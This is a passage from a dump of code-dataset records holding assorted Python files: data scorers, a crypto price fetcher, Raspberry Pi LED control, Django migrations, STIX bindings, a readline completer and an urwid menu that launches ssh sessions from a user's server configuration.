pofile(file.open())\n for unit in po.units:\n for i, msgid in enumerate(unit.msgid):\n if 'immersion' in msgid:\n unit.msgid[i] = msgid.replace('immersion', 'samādhi')\n changed = True\n if changed:\n po.save()","sub_path":".scripts/immersion.py","file_name":"immersion.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"287957625","text":"def test_simple_guess(test_dataset):\n \"\"\"\n \"\"\"\n\n ## imortation\n import pandas as pd\n from . import item4_parser\n from sklearn import metrics\n\n ## parameters\n match_prediction = []\n match_label = []\n\n ## load test dataset\n df = pd.read_csv(test_dataset)\n for index, row in df.iterrows():\n\n #-> loop over each entry\n title = row['TITLE']\n abstract = row['ABSTRACT']\n present = row['ITEM4']\n\n ## update list of labels\n match_label.append(present)\n\n ## run item1 parser\n match = item4_parser.simple_guess(title, abstract)\n\n ## update list of preditcion\n if(match):\n match_prediction.append(1)\n else:\n match_prediction.append(0)\n\n ## compure accuracy\n acc_score = metrics.accuracy_score(match_label, match_prediction)\n\n ## compute auc\n fpr, tpr, thresholds = metrics.roc_curve(match_label, match_prediction)\n auc_score = metrics.auc(fpr, tpr)\n\n ## return acc and auc as a tuple\n return(acc_score, auc_score)\n","sub_path":"scorer/test_item4_parser.py","file_name":"test_item4_parser.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"140190981","text":"from database import *\nimport datetime\nimport time\n\npricesql = PricesSQL()\nusers = UsersSQL()\nprojectfolder = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nlatestprice={}\nret = {}\nct = datetime.datetime.now()\n\nfor crypto in users.get_coins_in_table():\n ret[crypto] = None\n\nlatestprice['prices'] = ret\nlatestprice['timestamp'] = int(round(ct.timestamp()))\n\nfor crypto in latestprice['prices']:\n\n #this try and except is to make sure that the api is working.\n #Various tries are made until the API actually sends the json\n scraped=False\n while scraped==False:\n try:\n response= requests.get(f'https://api.coingecko.com/api/v3/simple/price?ids={crypto}&vs_currencies=usd')\n response=response.json()\n response[crypto]\n response=dict(response)\n scraped=True\n except:\n time.sleep(1)\n \n latestprice['prices'][crypto]=round(response[crypto]['usd'],6)\n \n\nwith open(os.path.join(projectfolder,\"data\",\"latestprices.json\"), \"w\") as f:\n latestprice=json.dump(latestprice,f,indent=0) \n","sub_path":"src/bandaid2.py","file_name":"bandaid2.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"441223290","text":"import RPi.GPIO as GPIO\nimport time\nimport random\nfrom multiprocessing import Process\n\n#setup\nGPIO.setmode(GPIO.BCM) \nGPIO.setwarnings(False) \nGPIO.setup(2, GPIO.OUT) \nGPIO.setup(3, GPIO.OUT) \nGPIO.setup(4, GPIO.OUT) \nGPIO.setup(17, GPIO.OUT) \nGPIO.setup(27, GPIO.OUT)\n\n#flash single cell\ndef flashCell(cellNum):\n\tflashPeriod = random.uniform(0.05, 0.1)\n\tholdPeriod = random.uniform(0.1, 0.5)\n\tflashRepeat = random.randint(1,4)\n\tfor i in range(0, flashRepeat):\n\t\tGPIO.output(cellNum, GPIO.HIGH)\n\t\ttime.sleep(flashPeriod)\n\t\tGPIO.output(cellNum, GPIO.LOW)\n\t\ttime.sleep(flashPeriod)\n\tGPIO.output(cellNum, GPIO.HIGH)\n\ttime.sleep(holdPeriod)\n\tGPIO.output(cellNum, GPIO.LOW)\n\n#specific cell functions\ndef flashCell1():\n\tflashCell(2)\ndef flashCell2():\t\n\tflashCell(3)\ndef flashCell3():\n\tflashCell(4)\ndef flashCell4():\n\tflashCell(17)\ndef flashCell5():\n\tflashCell(27)\n\n\n#main loop\nlength=random.randint(1,7)\nfor i in range(0,length):\n\tp1 = Process(target=flashCell1)\n\tp2 = Process(target=flashCell2)\n\tp3 = Process(target=flashCell3)\n\tp4 = Process(target=flashCell4)\n\tp5 = Process(target=flashCell5)\n\tcell_array = [p1,p2,p3,p4,p5]\n\t\n\twhile len(cell_array) > 0:\n\t\trandindex = random.randint(0, len(cell_array) - 1)\n\t\tprocess = cell_array[randindex]\n\t\tif random.randint(0,1) > 0:\n\t\t\tprocess.start()\n\t\tcell_array.remove(process)\n\t\ttime.sleep(random.uniform(0, 0.4))\n\ttime.sleep(random.uniform(0.5,2))\n","sub_path":"lightning.py","file_name":"lightning.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"227955207","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport json\n\ndef read_json_file (json_file):\n print (json_file)\n with open(json_file, 'r') as f:\n data = json.load(f)\n print (data)\n return (data)\n\nfilename = '/Users/rgarzon/Documents/Projects/POC_Lunas/Signature/AXA_ES/DNI_data/annotations/2.0/train/[43055801].pdf-1.json'\ndata = read_json_file(filename)\n\nfor obj in data['objects']:\n print (i)","sub_path":"signature/dni2.0_signature_detection/test_read_json.py","file_name":"test_read_json.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"131327100","text":"\"\"\"\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nimport os\nfrom django.utils import timezone\nfrom gwells.codes import CodeFixture\nfrom registries.models import Organization\nfrom registries.serializers import OrganizationAdminSerializer\n\ndef insert_remove_reasons(apps, schema_editor):\n data = {\n 'FAILTM': {\n 'description': 'Fails to maintain a requirement for registration',\n 'display_order': 1\n },\n 'NLACT': {\n 'description': 'No longer actively working in Canada',\n 'display_order': 2\n },\n 'NMEET': {\n 'description': 'Fails to meet a requirement for registration',\n 'display_order': 3\n }\n }\n RegistriesRemovalReason = apps.get_model('registries', 'RegistriesRemovalReason')\n\n for (key, value) in data.items():\n RegistriesRemovalReason.objects.update_or_create(code=key, defaults=value)\n\n\ndef revert_remove_reasons(apps, schema_editor):\n # We don't need to do anything on revert\n pass\n\n\ndef activity_codes():\n fixture = 'migrations/activity_codes.json'\n fixture_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), fixture)\n return CodeFixture(fixture_path)\n\n\ndef load_activity_codes(apps, schema_editor):\n return activity_codes().update_or_create_fixture(apps, schema_editor)\n\n\ndef unload_activity_codes(apps, schema_editor):\n return activity_codes().unload_fixture(apps, schema_editor)\n\n\ndef subactivity_codes():\n fixture = 'migrations/subactivity_codes.json'\n fixture_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), fixture)\n return CodeFixture(fixture_path)\n\n\ndef load_subactivity_codes(apps, schema_editor):\n ActivityCode = apps.get_model('registries', 'ActivityCode')\n codes = subactivity_codes()\n for item in codes.fixture:\n # Turns strings into models\n item['fields']['registries_activity'] = ActivityCode.objects.get(pk=item['fields']['registries_activity'])\n return codes.update_or_create_fixture(apps, schema_editor)\n\n\ndef unload_subactivity_codes(apps, schema_editor):\n return subactivity_codes().unload_fixture(apps, schema_editor)\n\ndef populate_empty_geometries(apps, schema_editor):\n \"\"\"\n Populate the geom field for all Organizations that meet the following\n criteria:\n 1. 'geom' is currently null\n 2. Either 'street_address' and 'city' are not null, or just 'city' is not null\n 3. 'province_state' is BC\n 4. The Organization's database record isn't expired\n The 'geom' field is populated by executing a no-change update \n on the organization serializer. This triggers the serializer to \n attempt to populate the geometry by geocoding the street address\n and/or city.\n \"\"\"\n orgs_to_update = \\\n Organization.objects.filter(\n geom__isnull=True, \n city__isnull=False,\n province_state__exact=\"BC\",\n expiry_date__gt=timezone.now()\n )\n for org in orgs_to_update:\n serializer = OrganizationAdminSerializer(org)\n validated_data = {\n \"city\": org.city #no change\n }\n serializer.update(org, validated_data)","sub_path":"app/backend/registries/data_migrations.py","file_name":"data_migrations.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"395269178","text":"\"\"\"\nThis module represents the Consumer.\n\nComputer Systems Architecture Course\nAssignment 1\nMarch 2021\n\"\"\"\n\nfrom threading import Thread\nimport time\n\n\nclass Consumer(Thread):\n \"\"\"\n Class that represents a consumer.\n \"\"\"\n\n def __init__(self, carts, marketplace, retry_wait_time, **kwargs):\n \"\"\"\n Constructor.\n\n :type carts: List\n :param carts: a list of add and remove operations\n\n :type marketplace: Marketplace\n :param marketplace: a reference to the marketplace\n\n :type retry_wait_time: Time\n :param retry_wait_time: the number of seconds that a producer must wait\n until the Marketplace becomes available\n\n :type kwargs:\n :param kwargs: other arguments that are passed to the Thread's __init__()\n \"\"\"\n\n Thread.__init__(self, **kwargs)\n\n self.carts = carts\n self.marketplace = marketplace\n self.retry_wait_time = retry_wait_time\n\n def run(self):\n\n for cart in self.carts:\n cart_id = self.marketplace.new_cart() #create cart_id for every list of add and remove\n\n for ops in cart: #loop for every operations\n while ops[\"quantity\"] != 0: #while quantity if not 0\n if ops[\"type\"] == \"add\": #verify if the operatio is to add or\n ret = self.marketplace.add_to_cart(cart_id, ops[\"product\"])\n if ret:\n ops[\"quantity\"] -= 1\n else:\n time.sleep(self.retry_wait_time)\n elif ops[\"type\"] == \"remove\": #remove from cart\n ret = self.marketplace.remove_from_cart(cart_id, ops[\"product\"])\n if ret is None: # if rezult is true substract from quantity else\n ops[\"quantity\"] -= 1\n else:\n time.sleep(self.retry_wait_time) #wait given times\n\n self.marketplace.place_order(cart_id) #at the end call place_order\n","sub_path":"tema/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"336054911","text":"#!/usr/bin/env python3\n\nimport re\nimport os\n\nclass Completer(object):\n def __init__(self):\n self.commands = ['ls', 'cd', 'download', 'upload', 'rename', 'mkdir', 'rm']\n self.re_space = re.compile('.*\\s+$', re.M)\n self.dic_file = []\n self.dic_dir = []\n\n def _listdir(self, root):\n \"List directory 'root' appending the path separator to subdirs.\"\n res = []\n for name in os.listdir(root):\n path = os.path.join(root, name)\n if os.path.isdir(path):\n name += os.sep\n res.append(name)\n return res\n\n def _complete_path(self, path=None):\n \"Perform completion of filesystem path.\"\n if not path:\n return self._listdir('.')\n dirname, rest = os.path.split(path)\n tmp = dirname if dirname else '.'\n res = [os.path.join(dirname, p)\n for p in self._listdir(tmp) if p.startswith(rest)]\n # more than one match, or single match which does not exist (typo)\n if len(res) > 1 or not os.path.exists(path):\n return res\n # resolved to a single directory, so return list of files below it\n if os.path.isdir(path):\n return [os.path.join(path, p) for p in self._listdir(path)]\n # exact file match terminates this completion\n return [path + ' ']\n\n def _complete_dic_all(self, arg=None):\n \"read from self.dic and match the arg, return the matchs.\"\n if not arg:\n return (self.dic_dir + self.dic_file)\n else:\n arg_match = re.compile(arg)\n return [name for name in (self.dic_dir + self.dic_file) if arg_match.match(name)]\n\n def _complete_dic_dir(self, arg=None):\n if not arg:\n return self.dic_dir\n else:\n arg_match = re.compile(arg)\n return [name for name in self.dic_dir if arg_match.match(name)]\n\n def _complete_dic_file(self, arg=None):\n if not arg:\n return self.dic_file\n else:\n arg_match = re.compile(arg)\n return [name for name in self.dic_file if arg_match.match(name)]\n\n def complete_ls(self, args):\n if not args:\n return self._complete_dic_dir()\n else:\n return self._complete_dic_dir(args[0])\n\n def complete_cd(self, args):\n if not args:\n return self._complete_dic_dir()\n else:\n return self._complete_dic_dir(args[0])\n\n def complete_download(self, args):\n if not args:\n return self._complete_dic_all()\n elif len(args) == 1:\n return self._complete_dic_all(args[0])\n elif len(args) == 2:\n return self._complete_path(args[1])\n else:\n return []\n\n def complete_upload(self, args):\n if not args:\n return self._complete_path('.')\n elif len(args) == 1:\n return self._complete_path(args[0])\n elif len(args) == 2:\n return self._complete_dic_dir(args[1])\n else:\n return []\n\n def complete_rename(self, args):\n if not args:\n return self._complete_dic_all()\n elif len(args) == 1:\n return self._complete_dic_all(args[0])\n else:\n return []\n\n def complete_rm(self, args):\n if not args:\n return self._complete_dic_all()\n elif len(args) == 1:\n return self._complete_dic_all(args[0])\n else:\n return []\n\n def complete(self, text, state):\n \"Generic readline completion entry point.\"\n buffer = readline.get_line_buffer()\n line = readline.get_line_buffer().split()\n # show all commands\n if not line:\n return [c + ' ' for c in self.commands][state]\n # account for last argument ending in a space\n if self.re_space.match(buffer):\n line.append('')\n # resolve command to the implementation function\n cmd = line[0].strip()\n if cmd in self.commands:\n impl = getattr(self, 'complete_%s' % cmd)\n args = line[1:]\n if args:\n return (impl(args) + [None])[state]\n return [cmd + ' '][state]\n results = [c + ' ' for c in self.commands if c.startswith(cmd)] + [None]\n return results[state]\n","sub_path":"python3_version/Completer.py","file_name":"Completer.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"326585910","text":"import sys\n\nclass pfam_hit:\n def __init__(self, prot_id, org, pf_id, pf_acc, pf_order, pf_count, start, end, score, eval):\n self.prot_id = prot_id\n self.org = org\n self.pf_id = pf_id\n self.pf_acc = pf_acc\n self.pf_order = pf_order\n self.pf_count = pf_count\n self.start = start\n self.end = end\n self.score = score\n self.eval = eval\n\n","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"643066580","text":"# Copyright (c) 2014, The MITRE Corporation. All rights reserved.\r\n# See LICENSE.txt for complete terms.\r\n\r\n\r\nimport stix\r\nfrom stix.common import VocabString, StructuredText\r\nimport stix.bindings.incident as incident_binding\r\nfrom .property_affected import PropertyAffected\r\nfrom cybox.core import Observables\r\nfrom stix.common.vocabs import OwnershipClass, ManagementClass, LocationClass\r\n\r\nclass AffectedAsset(stix.Entity):\r\n _namespace = \"http://stix.mitre.org/Incident-1\"\r\n _binding = incident_binding\r\n _binding_class = incident_binding.AffectedAssetType\r\n \r\n def __init__(self):\r\n self.type_ = None\r\n self.description = None\r\n self.business_function_or_role = None\r\n self.ownership_class = None\r\n self.management_class = None\r\n self.location_class = None\r\n #self.location = None\r\n self.nature_of_security_effect = None\r\n self.structured_description = None\r\n \r\n @property\r\n def type_(self):\r\n return self._type\r\n \r\n @type_.setter\r\n def type_(self, value):\r\n if not value:\r\n self._type = None\r\n elif isinstance(value, AssetType):\r\n self._type = value\r\n else:\r\n self._type = AssetType(value=value)\r\n \r\n @property\r\n def description(self):\r\n return self._description\r\n \r\n @description.setter\r\n def description(self, value):\r\n if not value:\r\n self._description = None\r\n elif isinstance(value, StructuredText):\r\n self._description = value\r\n else:\r\n self._description = StructuredText(value)\r\n \r\n @property\r\n def business_function_or_role(self):\r\n return self._business_function_or_role\r\n \r\n @business_function_or_role.setter\r\n def business_function_or_role(self, value):\r\n if not value:\r\n self._business_function_or_role = None\r\n elif isinstance(value, StructuredText):\r\n self._business_function_or_role = value\r\n else:\r\n self._business_function_or_role = StructuredText(value)\r\n \r\n @property\r\n def ownership_class(self):\r\n return self._ownership_class\r\n \r\n @ownership_class.setter\r\n def ownership_class(self, value):\r\n if not value:\r\n self._ownership_class = None\r\n elif isinstance(value, VocabString):\r\n self._ownership_class = value\r\n else:\r\n self._ownership_class = OwnershipClass(value)\r\n \r\n @property\r\n def management_class(self):\r\n return self._management_class\r\n \r\n @management_class.setter\r\n def management_class(self, value):\r\n if not value:\r\n self._management_class = None\r\n elif isinstance(value, VocabString):\r\n self._management_class = value\r\n else:\r\n self._management_class = ManagementClass(value)\r\n \r\n @property\r\n def location_class(self):\r\n return self._location_class\r\n \r\n @location_class.setter\r\n def location_class(self, value):\r\n if not value:\r\n self._location_class = None\r\n elif isinstance(value, VocabString):\r\n self._location_class = value\r\n else:\r\n self._location_class = LocationClass(value)\r\n \r\n @property\r\n def nature_of_security_effect(self):\r\n return self._nature_of_security_effect\r\n \r\n @nature_of_security_effect.setter\r\n def nature_of_security_effect(self, value):\r\n self._nature_of_security_effect = []\r\n if not value:\r\n return\r\n elif isinstance(value, list):\r\n for v in value:\r\n self.add_property_affected(v)\r\n else:\r\n self.add_property_affected(value)\r\n \r\n def add_property_affected(self, v):\r\n if not v:\r\n return\r\n elif isinstance(v, PropertyAffected):\r\n self.nature_of_security_effect.append(v)\r\n else:\r\n raise ValueError('Cannot add type %s to nature_of_security_effect list' % type(v))\r\n \r\n @property\r\n def structured_description(self):\r\n return self._structured_description\r\n \r\n @structured_description.setter\r\n def structured_description(self, value):\r\n if not value:\r\n self._structured_description = None\r\n elif isinstance(value, Observables):\r\n self._structured_description = value\r\n else:\r\n self._structured_description = Observables(value)\r\n \r\n @classmethod\r\n def from_obj(cls, obj, return_obj=None):\r\n if not obj:\r\n return None\r\n if not return_obj:\r\n return_obj = cls()\r\n \r\n return_obj.type_ = AssetType.from_obj(obj.get_Type())\r\n return_obj.description = StructuredText.from_obj(obj.get_Description())\r\n return_obj.business_function_or_role = StructuredText.from_obj(obj.get_Business_Function_Or_Role())\r\n return_obj.owernship_class = VocabString.from_obj(obj.get_Ownership_Class())\r\n return_obj.management_class = VocabString.from_obj(obj.get_Management_Class())\r\n return_obj.location_class = VocabString.from_obj(obj.get_Location_Class())\r\n #return_obj.location = None \r\n \r\n if obj.get_Nature_Of_Security_Effect():\r\n n = obj.get_Nature_Of_Security_Effect()\r\n return_obj.nature_of_security_effect = [PropertyAffected.from_obj(x) for x in n.get_Property_Affected()]\r\n return return_obj\r\n \r\n def to_obj(self, return_obj=None):\r\n if not return_obj:\r\n return_obj = self._binding_class()\r\n \r\n if self.type_:\r\n return_obj.set_Type(self.type_.to_obj())\r\n if self.description:\r\n return_obj.set_Description(self.description.to_obj())\r\n if self.business_function_or_role:\r\n return_obj.set_Business_Function_Or_Role(self.business_function_or_role.to_obj())\r\n if self.ownership_class:\r\n return_obj.set_Ownership_Class(self.ownership_class.to_obj())\r\n if self.management_class:\r\n return_obj.set_Management_Class(self.management_class.to_obj())\r\n if self.location_class:\r\n return_obj.set_Location_Class(self.location_class.to_obj())\r\n# if self.location:\r\n# return_obj.set_Location(self.location.to_obj())\r\n if self.nature_of_security_effect:\r\n property_affected_list = [x.to_obj() for x in self.nature_of_security_effect]\r\n n = self._binding.NatureOfSecurityEffectType(Property_Affected=property_affected_list)\r\n return_obj.set_Nature_Of_Security_Effect(n)\r\n if self.structured_description:\r\n return_obj.set_Structured_Description(self.structured_description.to_obj()) \r\n \r\n return return_obj\r\n \r\n @classmethod\r\n def from_dict(cls, d, return_obj=None):\r\n if not d:\r\n return None\r\n if not return_obj:\r\n return_obj = cls()\r\n \r\n return_obj.type_ = AssetType.from_dict(d.get('type'))\r\n return_obj.description = StructuredText.from_dict(d.get('description'))\r\n return_obj.business_function_or_role = StructuredText.from_dict(d.get('business_function_or_role'))\r\n return_obj.ownership_class = OwnershipClass.from_dict(d.get('ownership_class'))\r\n return_obj.management_class = ManagementClass.from_dict(d.get('management_class'))\r\n return_obj.location_class = LocationClass.from_dict(d.get('location_class'))\r\n #return_obj.location = Location.from_dict(d.get('location'))\r\n return_obj.nature_of_security_effect = [PropertyAffected.from_dict(x) for x in d.get('nature_of_security_effect')]\r\n return_obj.structured_description = Observables.from_dict(d.get('structured_description'))\r\n return return_obj\r\n \r\n def to_dict(self):\r\n d = {}\r\n if self.type_:\r\n d['type'] = self.type_.to_dict()\r\n if self.description:\r\n d['description'] = self.description.to_dict()\r\n if self.business_function_or_role:\r\n d['business_function_or_role'] = self.business_function_or_role.to_dict()\r\n if self.ownership_class:\r\n d['ownership_class'] = self.ownership_class.to_dict()\r\n if self.management_class:\r\n d['management_class'] = self.management_class.to_dict()\r\n if self.location_class:\r\n d['location_class'] = self.location_class.to_dict()\r\n# if self.location:\r\n# d['location'] = self.location.to_dict()\r\n if self.nature_of_security_effect:\r\n d['nature_of_security_effect'] = [x.to_dict() for x in self.nature_of_security_effect]\r\n if self.structured_description:\r\n d['structured_description'] = self.structured_description.to_dict()\r\n return d\r\n \r\n#from stix.common.vocabs import AssetType as DefaultAssetType\r\n\r\nclass AssetType(VocabString):\r\n _namespace = \"http://stix.mitre.org/Incident-1\"\r\n _binding = incident_binding\r\n _binding_class = incident_binding.AssetTypeType\r\n \r\n def __init__(self, value=None, count_affected=None):\r\n self.count_affected = count_affected\r\n super(AssetType, self).__init__(value)\r\n \r\n def is_plain(self):\r\n '''Override VocabString.is_plain()'''\r\n return False\r\n \r\n @classmethod\r\n def from_obj(cls, obj, return_obj=None):\r\n if not obj:\r\n return None\r\n if not return_obj:\r\n return_obj = cls()\r\n \r\n super(AssetType, cls).from_obj(obj, return_obj=return_obj)\r\n return_obj.count_affected = obj.get_count_affected()\r\n return return_obj\r\n \r\n def to_obj(self, return_obj=None):\r\n if not return_obj:\r\n return_obj = self._binding_class()\r\n \r\n super(AssetType, self).to_obj(return_obj=return_obj)\r\n return_obj.set_count_affected(self.count_affected)\r\n return return_obj\r\n \r\n @classmethod\r\n def from_dict(cls, d, return_obj=None):\r\n if not d:\r\n return None\r\n if not return_obj:\r\n return_obj = cls()\r\n \r\n super(AssetType, cls).from_dict(d, return_obj=return_obj)\r\n return_obj.count_affected = d.get('count_affected')\r\n return return_obj\r\n \r\n def to_dict(self):\r\n d = super(AssetType, self).to_dict()\r\n if self.count_affected:\r\n d['count_affected'] = self.count_affected\r\n return d\r\n \r\n \r\n","sub_path":"stix-1.1.1.0/stix/incident/affected_asset.py","file_name":"affected_asset.py","file_ext":"py","file_size_in_byte":10524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"420917953","text":"from __future__ import absolute_import\n\nfrom collections import OrderedDict\nimport atexit\nimport subprocess\n\nimport urwid\n\nimport ssh_facade.cli\nimport ssh_facade.configuration\nimport ssh_facade.logging\nimport ssh_facade.utils\n\n\n__all__ = ['entry_point']\n\n\n@ssh_facade.utils.instantiate()\nclass Application(object):\n\n def __init__(self):\n self.__mainloop = None\n self.__root = None\n\n @property\n def mainloop(self):\n return self.__mainloop\n\n @mainloop.setter\n def mainloop(self, value):\n self.__mainloop = value\n\n @property\n def root(self):\n return self.__root\n\n @root.setter\n def root(self, value):\n self.__root = value\n\n def reset_root_widget(self, top_w):\n self.root = urwid.Overlay(\n top_w, urwid.SolidFill(' '),\n align='center', width=('relative', 80),\n valign='middle', height=('relative', 90),\n min_width=20, min_height=9)\n\n if self.mainloop is not None:\n self.mainloop.widget = self.root\n\n def exit(self, delay=None):\n if delay is None:\n raise urwid.ExitMainLoop()\n\n self.mainloop.set_alarm_in(int(delay), lambda *_: Application.exit())\n\n def exit_on_q(self, key):\n if key not in ('q', 'Q'):\n return\n\n self.exit()\n\n def start_ssh_session(self, parameters):\n ssh_facade.logging.info(\n __name__, 'schedule ssh session;%s', repr(parameters))\n atexit.register(subprocess.call, parameters)\n self.exit()\n\n def ssh_parameters(self, server, recipe):\n result = ['ssh']\n\n try:\n result.extend(['-l', server['username']])\n except KeyError:\n pass\n\n try:\n result.extend(['-p', str(server['port'])])\n except KeyError:\n pass\n\n identity_path = ssh_facade.cli.parameters().identity\n\n if identity_path is not None:\n result.extend(['-i', identity_path])\n\n result.append(server['hostname'])\n\n if recipe['command'] is not None:\n result.extend(['-t', recipe['command']])\n\n return result\n\n\nclass PressAnyKeyToExit(urwid.Filler):\n\n def __init__(self, message):\n prompt = '\\n'.join([message, 'Press any key to exit...'])\n body = urwid.Edit(prompt, align='center')\n\n super(PressAnyKeyToExit, self).__init__(body, valign='top')\n\n def keypress(self, size, key):\n Application.exit()\n\n\nclass YorNPrompt(urwid.Filler):\n\n def __init__(self, message):\n prompt = ' '.join([message, '(y\\\\n)'])\n body = urwid.Edit(prompt, align='center')\n\n super(YorNPrompt, self).__init__(body, valign='top')\n\n def keypress(self, size, key):\n if key == 'y':\n return True\n if key == 'n':\n return False\n return None\n\n\nclass ConfigurationTemplatePrompt(YorNPrompt):\n\n def __init__(self):\n super(ConfigurationTemplatePrompt, self).__init__(\n 'Configuration file does not exist, create template?')\n\n def keypress(self, size, key):\n response = super(\n ConfigurationTemplatePrompt, self).keypress(size, key)\n\n if response is None:\n self.__show_response('Invalid input.')\n elif response:\n config_path = ssh_facade.configuration.create_servers_template()\n self.__show_response(\n 'Configuration template saved into \"{}\".'.format(config_path))\n else:\n self.__show_response('Bye!')\n\n def __show_response(self, message):\n Application.reset_root_widget(PressAnyKeyToExit(message))\n\n\nclass RecipeConfirmationPrompt(YorNPrompt):\n\n def __init__(self, ssh_parameters):\n self.__ssh_parameters = ssh_parameters\n super(RecipeConfirmationPrompt, self).__init__(\n '\\n'.join([' '.join(ssh_parameters), 'Continue?']))\n\n def keypress(self, size, key):\n response = super(\n RecipeConfirmationPrompt, self).keypress(size, key)\n\n if response is None:\n self.__show_response('Invalid input.')\n elif response:\n Application.start_ssh_session(self.__ssh_parameters)\n else:\n self.__show_response('Bye!')\n\n def __show_response(self, message):\n Application.reset_root_widget(PressAnyKeyToExit(message))\n\n\nclass ServerSelect(urwid.TreeListBox):\n\n class NodeWidget(urwid.TreeWidget):\n def __init__(self, node):\n super(ServerSelect.NodeWidget, self).__init__(node)\n self._w = urwid.AttrWrap(self._w, None)\n self._w.focus_attr = 'reversed'\n\n def get_display_text(self):\n node = self.get_node().get_value()\n\n if 'servers' in node.keys():\n return 'servers'\n\n return node['alias']\n\n def selectable(self):\n return True\n\n class ParentNodeWidget(NodeWidget):\n def __init__(self, node):\n super(ServerSelect.ParentNodeWidget, self).__init__(node)\n\n if 'servers' not in node.get_value().keys():\n self._toggle(False)\n\n def keypress(self, size, key):\n if key in ('enter', 'l'):\n self._toggle()\n elif key == 'j':\n key = 'down'\n elif key == 'k':\n key = 'up'\n\n return super(ServerSelect.ParentNodeWidget, self).keypress(size, key)\n\n def _toggle(self, value=None):\n if value is None:\n self.expanded = not self.expanded\n else:\n self.expanded = bool(value)\n\n self.update_expanded_icon()\n\n class LeafNodeWidget(NodeWidget):\n def keypress(self, size, key):\n if key in ('enter', 'l'):\n node = self.get_node()\n parent = node.get_parent()\n\n self.__on_recipe_selected(parent.get_value(), node.get_value())\n elif key == 'j':\n key = 'down'\n elif key == 'k':\n key = 'up'\n\n return super(ServerSelect.LeafNodeWidget, self).keypress(size, key)\n\n def __on_recipe_selected(self, server, recipe):\n ssh_parameters = Application.ssh_parameters(server, recipe)\n\n if not recipe.get('needs_confirmation', False):\n Application.start_ssh_session(ssh_parameters)\n return\n\n Application.reset_root_widget(RecipeConfirmationPrompt(ssh_parameters))\n\n class TreeLeaf(urwid.TreeNode):\n def load_widget(self):\n return ServerSelect.LeafNodeWidget(self)\n\n class TreeNode(urwid.ParentNode):\n\n def load_widget(self):\n return ServerSelect.ParentNodeWidget(self)\n\n def load_child_keys(self):\n data = self.get_value()\n\n if 'servers' in data:\n return list(data['servers'].keys())\n\n if 'recipes' in data:\n return list(data['recipes'].keys())\n\n ssh_facade.logging.critical(\n __name__, 'load_child_keys:data;%s', repr(data))\n raise NotImplementedError()\n\n def load_child_node(self, key):\n childdepth = self.get_depth() + 1\n\n if childdepth == 1:\n childdata = self.get_value()['servers'][key]\n elif childdepth == 2:\n childdata = self.get_value()['recipes'][key]\n else:\n ssh_facade.logging.critical(\n __name__,\n 'load_child_node:(key, childdepth);%s',\n repr((key, childdepth)))\n raise NotImplementedError()\n\n if 'recipes' in childdata:\n childclass = ServerSelect.TreeNode\n else:\n childclass = ServerSelect.TreeLeaf\n\n return childclass(\n childdata, parent=self, key=key, depth=childdepth)\n\n def __init__(self, servers):\n def list_to_dict(list_):\n return OrderedDict(sorted(\n ((item['alias'], item) for item in list_),\n key=lambda pair: pair[0]))\n\n servers_tree = list_to_dict(servers)\n\n for alias, server in servers_tree.items():\n server['recipes'] = list_to_dict(server['recipes'])\n\n tree_root = dict(servers=servers_tree)\n super(ServerSelect, self).__init__(\n urwid.TreeWalker(ServerSelect.TreeNode(tree_root)))\n\n\ndef entry_point():\n try:\n root_widget = ServerSelect(ssh_facade.configuration.servers())\n except ssh_facade.configuration.ServersNotConfigured:\n root_widget = ConfigurationTemplatePrompt()\n\n Application.reset_root_widget(root_widget)\n Application.mainloop = urwid.MainLoop(\n Application.root,\n palette=[('reversed', 'standout', '')],\n unhandled_input=Application.exit_on_q)\n\n Application.mainloop.run()\n\n","sub_path":"ssh_facade/urwid.py","file_name":"urwid.py","file_ext":"py","file_size_in_byte":8864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"611362444","text":"# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\n\nimport json\nimport os\n\nimport luigi\n\nfrom servicecatalog_puppet.workflow.portfolio.portfolio_management import (\n portfolio_management_task,\n)\n\n\nclass RequestPolicyTask(portfolio_management_task.PortfolioManagementTask):\n type = luigi.Parameter()\n region = luigi.Parameter()\n account_id = luigi.Parameter()\n organization = luigi.Parameter(default=None)\n\n def params_for_results_display(self):\n return {\n \"type\": self.type,\n \"account_id\": self.account_id,\n \"region\": self.region,\n \"cache_invalidator\": self.cache_invalidator,\n }\n\n def run(self):\n if self.organization is not None:\n p = f\"data/{self.type}/{self.region}/organizations/\"\n if not os.path.exists(p):\n os.makedirs(p, 